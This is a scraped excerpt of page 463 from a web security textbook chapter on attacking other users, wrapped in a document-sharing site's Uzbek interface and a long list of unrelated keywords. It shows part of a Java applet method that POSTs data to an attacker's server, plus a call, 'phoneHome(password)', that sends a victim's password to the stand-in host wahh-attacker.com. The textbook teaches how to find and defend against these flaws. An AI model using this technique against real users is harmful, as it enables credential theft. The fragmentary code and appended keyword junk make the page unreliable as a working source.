The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws


Chapter 12  ■ Attacking Other Users



Download 5,76 Mb.
Pdf ko'rish
bet793/875
Sana01.01.2022
Hajmi5,76 Mb.
#293004
1   ...   789   790   791   792   793   794   795   796   ...   875
Bog'liq
3794 1008 4334

Chapter 12 



Attacking Other Users



463

70779c12.qxd:WileyRed  9/14/07  3:14 PM  Page 463




urlConn.getOutputStream ());

dos.writeBytes(data);

dos.flush();

dos.close();

DataInputStream input = new DataInputStream(

urlConn.getInputStream ());

}

catch (Exception e)



{        

return e.getMessage();

}

return “data sent”;



}

This method accepts an arbitrary 

String

as input, and generates a 



POST

request to the attacker’s server, containing this data.

The attacker can cause the victim’s browser to load the applet by inserting

the following HTML before his malicious script:



id=”theApplet”>

The applet can then be invoked from the attacker’s script to issue asynchro-

nous requests, as follows:

theApplet.phoneHome(password);

Despite the various security restrictions imposed by the browser’s same ori-

gin policy, this technique is successful because:

■■

HTML documents may load Java applets from any domain.



■■

The applet is loaded from 

wahh-attacker.com

and only ever communi-

cates back to 

wahh-attacker.com

.

■■

XMLHttpRequest



is only ever used to communicate to 

wahh-app.com

,

from where the attacker’s script was loaded.



■■

Any JavaScript on an HTML page may invoke the public methods of

any applet loaded by the page.


Download 5,76 Mb.

Do'stlaringiz bilan baham:
1   ...   789   790   791   792   793   794   795   796   ...   875




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish